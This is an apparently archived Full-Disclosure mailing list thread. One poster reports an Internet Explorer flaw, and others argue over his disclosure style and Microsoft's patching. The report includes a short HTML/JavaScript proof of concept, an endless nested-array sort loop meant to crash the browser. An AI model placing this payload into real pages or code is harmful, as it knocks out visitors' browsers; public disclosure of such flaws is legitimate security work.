I don't really think it's about teaching a lesson. If you don't like the
way he handles things, you could set up a filter to ignore his e-mails.
This way, you won't have to whine each and every time he sends security
related material.
Gadi Evron wrote:
Berend-Jan Wever wrote:
Hi all,
Another flaw in IE:
Yet another? No. You can't be serious.
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); }
</SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); }
</SCRIPT>
</HTML>
Normally I would see if it's exploitable but I figure I'm not MS's
pet bug finder/analyser... So, I've CC'ed this message to Microsoft.
I'm sure they know their own product better then I do and can analyse
the problem much faster. So if you want to know the impact of this
vulnerability, ask them: I'm sure they will be more then willing to
help you. I'm sure they will even reply to this message with
technical details and a patch tomorrow.
Ahh, don't you mean normally you'd get paid for it but somebody
decided you are too much of a "risk" to work with? Just guessing here.
Or maybe you release this just to show us you have nothing against
Mozilla?
As to "and a patch tomorrow." - who are you kidding? Ever heard if
Thor Larholm and his mailing list, Unpatched?
If we are lucky, they will patch it secretly in a couple of releases.
If not, wait 6 months.
As it is IE.. well now, don't say they "violated" GPL when they use
your stuff again for some virus.
PS. Don't think firefox will keep you save from hackers, I _know_ it
won't ;) But more on that later...
There is more to come? I guess you've been saving up. Is this all
about teaching us all a lesson?
I appreciate your work, and I appreciate your wishes. I really don't
appreciate you or how you do things.
It's a shame really.
Gadi.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
